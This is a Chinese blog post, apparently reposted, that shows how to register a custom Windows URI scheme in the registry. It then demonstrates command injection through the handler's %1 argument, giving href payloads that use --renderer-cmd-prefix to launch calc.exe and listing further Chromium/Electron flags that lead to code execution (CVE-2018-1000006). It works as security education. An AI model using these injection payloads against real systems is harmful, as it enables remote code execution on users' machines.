URI Scheme注册伪协议实现远程命令执行

最新推荐文章于 2024-02-08 23:15:16 发布
最新推荐文章于 2024-02-08 23:15:16 发布
阅读量338 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/KevinGeorge/p/10201295.html
版权

Windows配置注册表注册伪协议

1、新建伪协议项

WIN+R 输入regedit 打开注册表,在注册表HKEY_CLASSES_ROOT键中新建一个项,项的名字就是你伪协议的名字,例如我注册一个cmd协议。
1070321-20181231034057826-1933987175.png
然后不用管默认字符串值,新建一个叫URL Procotol的字符串值,值为空即可。
1070321-20181231034207266-690732044.png

2、新建shell项

在cmd协议项中新建一个项 , 叫做shell,这个名称不能改。默认字符串值为空
1070321-20181231034339552-1845255244.png

3、新建open项

在shell项中新建一个项 , 叫做open,这个名称不能改。默认字符串值为空
1070321-20181231034433060-1042973161.png

4、新建command项

在open项中新建一个项 , 叫做command,这个名称不能改。默认字符串值为可执行文件路径和参数等
1070321-20181231034549269-699255367.png

远程命令执行漏洞

根据这个地方的参数引号闭合情况去构造payload,类似SQL注入

  • 是%1 则payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
  • 要是“%1”则payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
    效果(备注这里需要使用IE内核测试):
    1070321-20181231035505600-319426035.png

其他引起RCE的参数如下:

  • --renderer-cmd-prefix
  • --gpu-launcher
  • --utility-cmd-prefix
  • --ppapi-plugin-launcher
  • --nacl-gdb
  • --ppapi-flash-path
  • --ppapi-flash-args

参考文献:

Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古

转载于:https://www.cnblogs.com/KevinGeorge/p/10201295.html

weixin_30448603
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
win7图片库
04-24
但是Windows 7图片库查看器有一个“硬伤”:不支持浏览gif格式的图片。它可以让Windows 7图片查看器自动关联并支持用户查看gif图片。
URISchemeHandler-1.7.zip
10-13
URISchemeHandler.zip,一个Java库,用于打开和注册具有uri方案的应用程序。一个Java库,用于添加和使用在操作系统中注册uri方案处理程序。
windows注册表添加协议
mynameisjinxiaokai的博客
09-16 770
windows中,注册表中包含各种协议(http,ftp,telnet等)的信息,包含了默认打开方式的参数。试一下,从IE的地址栏中输入telnet://www.163.com,出现什么了?弹出了一个命令行窗口,开始进行telnet操作。IE居然能完成这个,那么为什么就不能完成“telnet1://参数” 呢? Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\SIMS] @="SIMS Protocol" "URL Protocol"="
注册URL Scheme步骤以及打开其他App
童真的烂漫的专栏
01-19 8592
注册 URL Scheme1.设置URL Scheme 在safari地址栏中输入:URL Schemes://identifier (例如:iOSEnterURL://com.Demo.www)就可以打开注册了URL Schemes的APP的。 其中URL Schemes是必填的,identifier是选填 一般情况下,是会调用先安装的app。但是iOS的系统app的URL Scheme肯定是
从网页上打开本地应用程序——WindowsURI Scheme的使用
热门推荐
时间是最为奇妙的东西
02-20 1万+
一、问题描述: 最近做的项目要求从网页端启动本地的应用程序(windows系统下),同时会给应用程序传递某些参数,所以接触到了URL Protocol这个东西。 二、所处条件: 1、本地的应用程序是unity3D开发的软件。 2、目标平台是windows PC端。 3、使用AdvancedInstaller制作软件安装包。 二、主要问题的解决过程: 1、编写注册表处理文件,即*.re
Python PyQt、QT 浏览器调用本地exe(应用程序)及传参(Windows & Mac)
信橙则灵的博客
12-29 3354
pyqt 通过浏览器打开本地app及传参(Windows & Mac) 在我们使用应用时,我们经常涉及到应用通过浏览器打开本地应用,比如百度网盘、腾讯会议等等,这种浏览器打开本地app的方式,十分高大上。但你知道实现方式吗? 其实,在Windows、Mac、Linux等系统中实现的方法都是「注册应用程序协议」,比如说在Windows,只需在注册表中写入应用程序启动信息,在浏览器调用程序时,会先去注册表中查询应用信息,然后调用启动信息,即可实现协议与执行程序的关联。 Windows 注册自定义 UR
Windows - URL Scheme - 在Windows上无管理员权限为你的程序添加URL Scheme
最新发布
<font color="Pink">Tisfy的博客</font>
02-08 1011
Windows - URL Scheme - 在Windows上无管理员权限为你的程序添加URL Scheme 想不想在浏览器打开/控制你的电脑应用? + 在Windows和MacOS上,你可以使用这种协议打开或控制本地应用(也许[Linux](https://github.com/youssef-attai/linux-custom-url-scheme)也行?) + 在Android和iOS上,你可以使用这种协议在应用之间跳转(并传参)
chromium 47 Chrome浏览器启动命令行参数
一朵花开的时间
10-13 4805
Chrome浏览器启动命令行参数
Scheme跳转协议
几度清浅的专栏
08-22 9801
URL Scheme协议Android中的Scheme是一种页面内跳转协议,通过自定义Scheme协议,可以跳转到app中的任何页面。 服务器可以定制化跳转app页面 app可以通过Scheme跳转到另一个app页面 可以通过h5页面跳转app原生页面 协议格式 Uri.parse("qh://test:8080/goods?goodsId=8897&name=fuck") qh代表Scheme协议
javascript:是一个伪协议
xiaoguan_liu的博客
09-25 1198
javascript: 是一个伪协议,其他的伪协议还有 mail:  tel:  file:  等等。 &lt;a id="jsPswEdit" class="set-item" href="javascript:;"&gt;修改密码&lt;/a&gt; javascript:是表示在触发&lt;a&gt;默认动作时,执行一段JavaScript代码,而 javascript:; 表示什么都不..
Windows 如何注册自己的伪协议
HelloKandy's Blog
02-02 2008
介绍伪协议前先介绍一下协议是什么。这里说到的协议不是指网络上的TCP/IP协议,而是操作系统提供支持的一种协议,类似标准协议HTTP, FTP。自定义协议叫做伪协议。 如何注册一个伪协议? 操作系统的协议都写在注册表[HKEY_CLASSES_ROOT]的KEY值下,我们在注册表内添加一项对我们软件支持的协议标志即可!
Android应用内跳转Scheme协议
Watson的博客
10-18 7524
之前一篇文章WebView使用解析(一)之基本用法我讲过了WebView与JS交互的方式,JS调用Java代码主要是通过对象注入的方式实现的,即使用addJavascriptInterface。而JAVA调用JS代码则是通过javascript:伪协议实现的,即javascript:methodName(params……)。但是这种交互方式存在着不少问题: 1、Java 调用 js 里面的函数,
Data URI scheme详解和使用实例及图片base64编码实现方法
01-21
一、 Data URI scheme 简介 Data URI scheme是在RFC2397中定义的,目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入。比如上面那串字符,其实是一张小图片,将这些字符复制黏贴到火狐的地址栏中并...
.net 图片base64编码 Data URI scheme
03-29
.net 图片 base64 编码 Data URI scheme
小议Data URI scheme及其在CSS中的相关使用
09-24
主要介绍了Data URI scheme及其在CSS中的相关使用,文中主要针对其在图片显示方面的应用,需要的朋友可以参考下
nginx location中uri的截取的实现方法
09-29
主要介绍了nginx location中uri的截取的实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
windows系统下scheme语言编程环境的搭建
沙堆
07-28 1687
WIN下scheme语言编程环境的搭建概要下载并安装emacs下载并安装chezscheme配置使用尾声 概要 在windows系统下(并不合适,阻力好大),使用chezscheme+emacs 搭建scheme语言的编程环境. 下载并安装emacs 请自行搜索并下载安装emacs(用来和语言实现交互的文本编辑器) 下载并安装chezscheme 在Github是有windows系统可用的安装包的.........
win7下scheme环境配置
weixin_33712881的博客
01-20 164
运行lisp方言——scheme,在windows下,用eclipse。 1.eclipse装好 2.eclipse安装插件scheme48 development took, http://www.s48.org/sdt/sdt-update-site 3.安装scheme48解释器的windows版本,http://s48.org/1.8/windows.html 4.eclipse中配置: ...
应用安全-浏览器安全-攻防
weixin_30865427的博客
07-29 411
应用安全-浏览器安全-Chrome浏览器 关闭安全模式暂时关闭 Linux:google-chrome --disable-web-security Mac:open -a Google\ Chrome --args --disable-web-security windows: 进入到chrome安装目录,chrome.exe --disable-web-securi...
jpeg 转Data URI scheme jpeg c代码
06-03
下面是将JPEG图片转换为Data URI Scheme格式的C代码: ```c #include #include #include int main() { FILE* fp; char* data; long file_size; char* base64_data; char* data_uri; char* file_name = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值